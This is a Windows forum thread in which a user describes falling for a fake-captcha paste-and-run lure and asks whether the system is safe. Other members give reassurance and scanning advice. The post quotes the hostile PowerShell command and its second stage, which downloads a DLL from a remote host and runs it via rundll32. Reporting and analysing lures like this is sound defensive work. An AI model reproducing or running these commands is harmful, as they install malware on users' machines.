Am I safe?


cns00

Well-known member
Local time
3:07 PM
Posts
28
OS
windows 11
I was looking for a psychologist in my area. I did a search and I opened a result. I got a captcha. It asked me to press ctrl and R, press ctrl and V and then press enter. It was late at night and I wasn't focusing so I did it without thinking☹️

Nothing happened after I pressed enter and then my antivirus which is ESET Home gave me an alert that it blocked something. I looked into it.

First I opened Wordpad and I pressed ctrl and V to see what was the command that I pasted. It was this:
powershell -w h -ep bypass -c "$P='https://';$US='still-snow-667e.prot...b5530d';$c=[char]0x69 [char]0x65 [char]0x78;& $c (irm $P$US$L)"

That command was trying to open https://still-snow-667e(dot)protexweer(dot)workers(dot)dev/gd?id=98532882-12b5530d in a hidden PowerShell window. I opened that website in Windows Sandbox and I saw this:
$downloadUrl="https://still-snow-667e(dot)protexweer(dot)workers(dot)dev/download?id=98532882-12b5530dnull"; (New-Object System.Net.WebClient).DownloadFile($downloadUrl, "$env:USERPROFILE\Downloads\text.dll"); Start-Process "rundll32.exe" "$env:USERPROFILE\Downloads\text.dll,Start source=98532882-12b5530d"

That looks like it was trying to download text.dll which is the malware file and run it. I checked my downloads folder. There is no text.dll. Also I checked the ESET Home alerts to see what it blocked. I saw this. That means that ESET Home blocked the website that the hidden PowerShell window tried to open thus no malware was downloaded.

I did a full system scan by using ESET Home, EmiSoft emergency portable scanner and Kaspersky emergency portable scanner. No malware was found.

Thus I am safe and no need to wipe everything and reinstall Windows?
 

My Computer My Computer

At a glance

windows 11i932GBRTX4090
OS
windows 11
Computer type
Laptop
Manufacturer/Model
Lenovo Legion Pro 7
CPU
i9
Memory
32GB
Graphics Card(s)
RTX4090
i would say you are about 99% safe as the download was stopped before it could enter the system and execute.
i would restart your system then do the checks again but also check all network connections to see if there is anything not recognised.

it also maybe an idea to also run MalwareBytes as well

best of luck Steve ..
 

My Computers My Computers

  • At a glance

    Debian 13 KDE .. Windows 11 HomeRyzen 7 5825u64GB DDR4 3200Ryzen 7 5825u
    OS
    Debian 13 KDE .. Windows 11 Home
    Computer type
    PC/Desktop
    Manufacturer/Model
    HP 24" AiO
    CPU
    Ryzen 7 5825u
    Motherboard
    HP
    Memory
    64GB DDR4 3200
    Graphics Card(s)
    Ryzen 7 5825u
    Sound Card
    RealTek
    Monitor(s) Displays
    24" HP AiO
    Screen Resolution
    1920 x 1080 @60 Hz
    Hard Drives
    1TB WD Blue SN580 M2 SSD Partitioned.
    2x 1TB USB HDD External Backup/Storage.
    PSU
    90W external power brick
    Case
    24" All in One
    Cooling
    Default Air Cooling
    Keyboard
    HP WiFi UK extended
    Mouse
    HP WiFi 3 Button
    Internet Speed
    1GB full fibre
    Browser
    Edge & Firefox
    Antivirus
    AVG Internet Security/Windows Defender
    Other Info
    Mainly Open Source Software
  • At a glance

    Ubuntu 22.04.5 LTSi5 7200u16GB DDR4Intel
    Operating System
    Ubuntu 22.04.5 LTS
    Computer type
    Laptop
    Manufacturer/Model
    Dell 13" Latitude 2017
    CPU
    i5 7200u
    Motherboard
    Dell
    Memory
    16GB DDR4
    Graphics card(s)
    Intel
    Sound Card
    Intel
    Monitor(s) Displays
    13" Dell Laptop
    Hard Drives
    250GB Crucial 2.5" SSD
    Mouse
    Generic WiFi 3 button
    Internet Speed
    WiFi only
    Browser
    Firefox
    Antivirus
    ClamAV TK
    Other Info
    Mainly Open Source Software
it also maybe an idea to also run MalwareBytes as well
I don't want to install another antivirus because it will conflict with ESET Home so that's why I am doing full system scans by using portable antivirus programs. So far I scanned with EmiSoft emergency portable scanner and Kaspersky emergency portable scanner. Are there any more portable antivirus programs that I should use?
 

My Computer My Computer

At a glance

windows 11i932GBRTX4090
OS
windows 11
Computer type
Laptop
Manufacturer/Model
Lenovo Legion Pro 7
CPU
i9
Memory
32GB
Graphics Card(s)
RTX4090
I was looking for a psychologist in my area.


You might try the old fashioned way. Use a physical phone book (if available), or just ask your doctor.
You should also be able to find assistance at any large hospital.
If you're in the US, you can always check out the psychologist's business, at the Better Business Bureau.


I got a captcha. It asked me to press ctrl and R, press ctrl and V and then press enter.


Anytime you see a captcha like that. Stay away !!

Captchas should ask you to click on all the bicycles or buses, or crosswalks, in the picture.
As you know, Ctrl + V is the PASTE shortcut. That would be a RED flag for me.
 
Last edited:

My Computers My Computers

  • At a glance

    Win 11 Home ♦♦♦26200.8737 ♦♦♦♦♦♦♦25H2AMD Ryzen 7 3700XG.Skill (F4-3200C14D-16GTZKW)EVGA RTX 2070 (08G-P4-2171-KR)
    OS
    Win 11 Home ♦♦♦26200.8737 ♦♦♦♦♦♦♦25H2
    Computer type
    PC/Desktop
    Manufacturer/Model
    Built by Ghot® [May 2020]
    CPU
    AMD Ryzen 7 3700X
    Motherboard
    Asus Pro WS X570-ACE (BIOS 5302)
    Memory
    G.Skill (F4-3200C14D-16GTZKW)
    Graphics Card(s)
    EVGA RTX 2070 (08G-P4-2171-KR)
    Sound Card
    Realtek ALC1220P / ALC S1220A
    Monitor(s) Displays
    Dell U3011 30"
    Screen Resolution
    2560 x 1600
    Hard Drives
    2x Samsung 860 EVO 500GB,
    WD 4TB Black FZBX - SATA III,
    WD 8TB Black FZBX - SATA III,
    DRW-24B1ST CD/DVD Burner
    PSU
    PC Power & Cooling 750W Quad EPS12V
    Case
    Cooler Master ATCS 840 Tower
    Cooling
    CM Hyper 212 EVO (push/pull)
    Keyboard
    Ducky DK9008 Shine II Blue LED
    Mouse
    Logitech Optical M-100
    Internet Speed
    300/300
    Browser
    Firefox (latest)
    Antivirus
    Bitdefender Total Security
    Other Info
    Speakers: Klipsch Pro Media 2.1
  • At a glance

    Windows XP Pro 32bit w/SP3AMD Athlon 64 X2 5000+ (OC'd @ 3.2Ghz)TWIN2X2048-6400C4DHX (2 x 1GB, DDR2 800)EVGA 256-P2-N758-TR GeForce 8600GT SSC
    Operating System
    Windows XP Pro 32bit w/SP3
    Computer type
    PC/Desktop
    Manufacturer/Model
    Built by Ghot® (not in use)
    CPU
    AMD Athlon 64 X2 5000+ (OC'd @ 3.2Ghz)
    Motherboard
    ASUS M2N32-SLI Deluxe Wireless Edition
    Memory
    TWIN2X2048-6400C4DHX (2 x 1GB, DDR2 800)
    Graphics card(s)
    EVGA 256-P2-N758-TR GeForce 8600GT SSC
    Sound Card
    Onboard
    Monitor(s) Displays
    ViewSonic G90FB Black 19" Professional (CRT)
    Screen Resolution
    up to 2048 x 1536
    Hard Drives
    WD 36GB 10,000rpm Raptor SATA
    Seagate 80GB 7200rpm SATA
    Lite-On LTR-52246S CD/RW
    Lite-On LH-18A1P CD/DVD Burner
    PSU
    PC Power & Cooling Silencer 750 Quad EPS12V
    Case
    Generic Beige case, 80mm fans
    Cooling
    ZALMAN 9500A 92mm CPU Cooler
    Keyboard
    Logitech Classic Keybooard 200
    Mouse
    Logitech Optical M-BT96a
    Internet Speed
    300/300
    Browser
    Firefox 3.x ??
    Antivirus
    Symantec (Norton)
    Other Info
    Still assembled, still runs. Haven't turned it on for 15 years?
Malwarebytes Antimalware paid version includes an antivirus which would conflict with ESET, however the trial (free) version has the antivirus disabled, it uses only the malware scanner. So there is no problem installing the trial version and do a full system scan. I mostly use Superantispyware free (unregistered) for malware removal:


If Superantispyware finds too many results (over 500), I then use Malwarebytes Antimalware to do a second full system scan to find anything the former might have missed. If the second also finds too many results, I consider backing up my data and reinstall Windows. However, don't panic from your description it seems you won't find too many. Mostly useless cookies, nothing serious. Needless to say you should remove all findings.
 

My Computers My Computers

  • At a glance

    Windows 11 Pro 23H2 (5699), 25H2 (8655)Mobile DualCore Intel Core 2 Duo T7250, 2000 MHz4GBMobile Intel(R) GMA 4500M (Mobile 4 series)
    OS
    Windows 11 Pro 23H2 (5699), 25H2 (8655)
    Computer type
    Laptop
    Manufacturer/Model
    Acer Extensa 5630EZ
    CPU
    Mobile DualCore Intel Core 2 Duo T7250, 2000 MHz
    Motherboard
    Acer Extensa 5630
    Memory
    4GB
    Graphics Card(s)
    Mobile Intel(R) GMA 4500M (Mobile 4 series)
    Sound Card
    Realtek ALC268 @ Intel 82801IB ICH9 - High Definition Audio Controller
    Monitor(s) Displays
    1
    Screen Resolution
    1280x800
    Hard Drives
    Samsung SSD 850 EVO 250GB SATA Device (250 GB, SATA-III)
    Internet Speed
    VDSL 50 Mbps
    Browser
    MICROSOFT EDGE
    Antivirus
    WINDOWS DEFENDER
    Other Info
    Legacy MBR installation, no TPM, no Secure Boot, no WDDM 2.0 graphics drivers, no SSE4.2, cannot get more unsupported ;) This is only my test laptop. I had installed Windows 11 here before upgrading my main PC. For my main PC I use everyday see my 2nd system specs.
  • At a glance

    Windows 11 Pro v25H2 (build 26200.8655)Intel Core-i7 3770 3.40GHz s1155 (3rd generat...2x Kingston Hyper-X Blu 8GB DDR3-1600GIGABYTE GeForce RTX 3050 WINDFORCE OC V2 6GB...
    Operating System
    Windows 11 Pro v25H2 (build 26200.8655)
    Computer type
    PC/Desktop
    Manufacturer/Model
    Custom-built PC
    CPU
    Intel Core-i7 3770 3.40GHz s1155 (3rd generation)
    Motherboard
    Asus P8H61 s1155 ATX
    Memory
    2x Kingston Hyper-X Blu 8GB DDR3-1600
    Graphics card(s)
    GIGABYTE GeForce RTX 3050 WINDFORCE OC V2 6GB (GV-N3050WF2OCV2-6GD)
    Sound Card
    Realtek HD audio (ALC887)
    Monitor(s) Displays
    Sony Bravia KDL-19L4000 19" LCD TV via VGA
    Screen Resolution
    1440x900 32-bit 60Hz
    Hard Drives
    WD Blue SA510 2.5 1000GB SSD as system disk, Western Digital Caviar Purple 4TB SATA III (WD40PURZ) as second
    PSU
    Thermaltake Litepower RGB 550W Full Wired
    Case
    SUPERCASE MIDI-TOWER
    Cooling
    Deepcool Gamma Archer CPU cooler, 1x 8cm fan at the back
    Keyboard
    Mitsumi 101-key PS/2
    Mouse
    Sunnyline OptiEye PS/2
    Internet Speed
    100Mbps
    Browser
    Microsoft Edge, Mozilla Firefox
    Antivirus
    Microsoft Windows Defender
    Other Info
    Legacy BIOS (MBR) installation, no TPM, no Secure Boot, WDDM 3.0 graphics drivers, WEI score 7.4
@cns00

Again, if you are in the US... there's the American Psychological Association (APA).
I'm sure they could help...


 

My Computers My Computers

  • At a glance

    Win 11 Home ♦♦♦26200.8737 ♦♦♦♦♦♦♦25H2AMD Ryzen 7 3700XG.Skill (F4-3200C14D-16GTZKW)EVGA RTX 2070 (08G-P4-2171-KR)
    OS
    Win 11 Home ♦♦♦26200.8737 ♦♦♦♦♦♦♦25H2
    Computer type
    PC/Desktop
    Manufacturer/Model
    Built by Ghot® [May 2020]
    CPU
    AMD Ryzen 7 3700X
    Motherboard
    Asus Pro WS X570-ACE (BIOS 5302)
    Memory
    G.Skill (F4-3200C14D-16GTZKW)
    Graphics Card(s)
    EVGA RTX 2070 (08G-P4-2171-KR)
    Sound Card
    Realtek ALC1220P / ALC S1220A
    Monitor(s) Displays
    Dell U3011 30"
    Screen Resolution
    2560 x 1600
    Hard Drives
    2x Samsung 860 EVO 500GB,
    WD 4TB Black FZBX - SATA III,
    WD 8TB Black FZBX - SATA III,
    DRW-24B1ST CD/DVD Burner
    PSU
    PC Power & Cooling 750W Quad EPS12V
    Case
    Cooler Master ATCS 840 Tower
    Cooling
    CM Hyper 212 EVO (push/pull)
    Keyboard
    Ducky DK9008 Shine II Blue LED
    Mouse
    Logitech Optical M-100
    Internet Speed
    300/300
    Browser
    Firefox (latest)
    Antivirus
    Bitdefender Total Security
    Other Info
    Speakers: Klipsch Pro Media 2.1
  • At a glance

    Windows XP Pro 32bit w/SP3AMD Athlon 64 X2 5000+ (OC'd @ 3.2Ghz)TWIN2X2048-6400C4DHX (2 x 1GB, DDR2 800)EVGA 256-P2-N758-TR GeForce 8600GT SSC
    Operating System
    Windows XP Pro 32bit w/SP3
    Computer type
    PC/Desktop
    Manufacturer/Model
    Built by Ghot® (not in use)
    CPU
    AMD Athlon 64 X2 5000+ (OC'd @ 3.2Ghz)
    Motherboard
    ASUS M2N32-SLI Deluxe Wireless Edition
    Memory
    TWIN2X2048-6400C4DHX (2 x 1GB, DDR2 800)
    Graphics card(s)
    EVGA 256-P2-N758-TR GeForce 8600GT SSC
    Sound Card
    Onboard
    Monitor(s) Displays
    ViewSonic G90FB Black 19" Professional (CRT)
    Screen Resolution
    up to 2048 x 1536
    Hard Drives
    WD 36GB 10,000rpm Raptor SATA
    Seagate 80GB 7200rpm SATA
    Lite-On LTR-52246S CD/RW
    Lite-On LH-18A1P CD/DVD Burner
    PSU
    PC Power & Cooling Silencer 750 Quad EPS12V
    Case
    Generic Beige case, 80mm fans
    Cooling
    ZALMAN 9500A 92mm CPU Cooler
    Keyboard
    Logitech Classic Keybooard 200
    Mouse
    Logitech Optical M-BT96a
    Internet Speed
    300/300
    Browser
    Firefox 3.x ??
    Antivirus
    Symantec (Norton)
    Other Info
    Still assembled, still runs. Haven't turned it on for 15 years?
I was looking for a psychologist in my area. I did a search and I opened a result. I got a captcha. It asked me to press ctrl and R, press ctrl and V and then press enter. It was late at night and I wasn't focusing so I did it without thinking☹️
WOW!
 

My Computers My Computers

  • At a glance

    Win 11 Pro 25H2, Build 26200.8737Intel Core i5 1450064GB DDR4GeForce RTX 4060
    OS
    Win 11 Pro 25H2, Build 26200.8737
    Computer type
    PC/Desktop
    Manufacturer/Model
    Home Brew
    CPU
    Intel Core i5 14500
    Motherboard
    Gigabyte B760M G P WIFI
    Memory
    64GB DDR4
    Graphics Card(s)
    GeForce RTX 4060
    Sound Card
    Chipset Realtek
    Monitor(s) Displays
    LG 45" Ultragear, Acer 24" 1080p
    Screen Resolution
    5120x1440, 1920x1080
    Hard Drives
    Crucial P310 2TB 2280 PCIe Gen4 3D NAND NVMe M.2 SSD (O/S)
    Silicon Power 2TB US75 NVMe PCIe Gen4 M.2 2280 SSD (backup)
    Crucial BX500 2TB 3D NAND (2nd backup)
    Seagate 4TB Ironwolf, rotating HDD archive files
    External off-line backup Drives: 2 NVMe 4TB drives in external enclosures
    PSU
    Thermaltake Toughpower GF3 750W
    Case
    LIAN LI LANCOOL 216 E-ATX PC Case
    Cooling
    Lots of fans!
    Keyboard
    Microsoft Comfort Curve 2000
    Mouse
    Logitech G305
    Internet Speed
    Verizon FiOS 1GB
    Browser
    Firefox
    Antivirus
    Malware Bytes & Windows Defender Security
  • At a glance

    Win 11 Pro 25H2, Build 26200.8655Intel Core i5 1440032GB DDR5Intel 700 Embedded GPU
    Operating System
    Win 11 Pro 25H2, Build 26200.8655
    Computer type
    PC/Desktop
    Manufacturer/Model
    Home Brew
    CPU
    Intel Core i5 14400
    Motherboard
    Gigabyte B760M DS3H AX
    Memory
    32GB DDR5
    Graphics card(s)
    Intel 700 Embedded GPU
    Sound Card
    Realtek Embedded
    Monitor(s) Displays
    27" HP 1080p
    Screen Resolution
    1920x1080
    Hard Drives
    Crucial P310 2TB 2280 PCIe Gen4 eD NAND PCIe SSD
    Samsung EVO 990 2TB NVMe Gen4 SSD
    Samsung 2TB SATA SSD
    PSU
    Thermaltake Smart BM3 650W
    Case
    Okinos Micro ATX Case
    Cooling
    Fans
    Keyboard
    Microsoft Comfort Curve 2000
    Mouse
    Logitech G305
    Internet Speed
    Verizon FiOS 1GB
    Browser
    Firefox
    Antivirus
    Malware Bytes & Windows Defender Security
  • Nimo N171 17" Laptop, (Intel i3-1215U, 16GB RAM, 2TB NVMe, Win11 Pro)
    Acemagic Vista Mini PC V1 (Intel N150, 16GB RAM, 1TB NVMe, Win11 Pro)
    HP ENVY h8-1540t, (24GB RAM, 2TB SSD, 2TB HDD, Win11 Pro)
i would say you are about 99% safe as the download was stopped before it could enter the system and execute.
i would restart your system then do the checks again but also check all network connections to see if there is anything not recognised.

it also maybe an idea to also run MalwareBytes as well

best of luck Steve ..
I would like to add that open windows resource monitor directly after reboot, as that one show what processes makes network connections to what IP's/domains.
 

My Computers My Computers

  • At a glance

    Linux: Debian, Kali-linux, Alma, Win: 7, 8.1,...i3, i5 and i7 From 2gen to 9th gen... Server ...
    OS
    Linux: Debian, Kali-linux, Alma, Win: 7, 8.1,2012R
    Manufacturer/Model
    HP Elitebook 840, AsusX53, Aspire E1-572. AsusUX32A, HP Pro3130mt+3010mt, HP Proliant ML150, 3xCustom-PC, i3, i5, i7
    CPU
    i3, i5 and i7 From 2gen to 9th gen... Server dual Xenon
    Hard Drives
    Sata, M.2, SAS
  • At a glance

    Retro: 2003server.XPpro, Win2000, Win98SE, Wi...Oldest intel 8088 up to P4 dual core
    Operating System
    Retro: 2003server.XPpro, Win2000, Win98SE, Win95, Win3.11, MS-DOS, IBM-DOS
    Manufacturer/Model
    Commodore, AST, Fujitsu, Compaq, etc etc. etc Around 15 desktops and 20 laptops in the collection
    CPU
    Oldest intel 8088 up to P4 dual core
    Hard Drives
    MFM, IDE, SCSI

My Computer My Computer

At a glance

Win 11 Pro 25H2Ryzen 5 4500U16GB
OS
Win 11 Pro 25H2
Computer type
PC/Desktop
Manufacturer/Model
ASUS PN50 mini pc
CPU
Ryzen 5 4500U
Memory
16GB
Hard Drives
WD Blue SN570 500GB, Samsung 870 QVO SATA 1TB
Keyboard
MS Bluetooth
Mouse
Logitech G305
Internet Speed
50mbps WIFI
Browser
MS Edge
Antivirus
MS Defender
Back
Top Bottom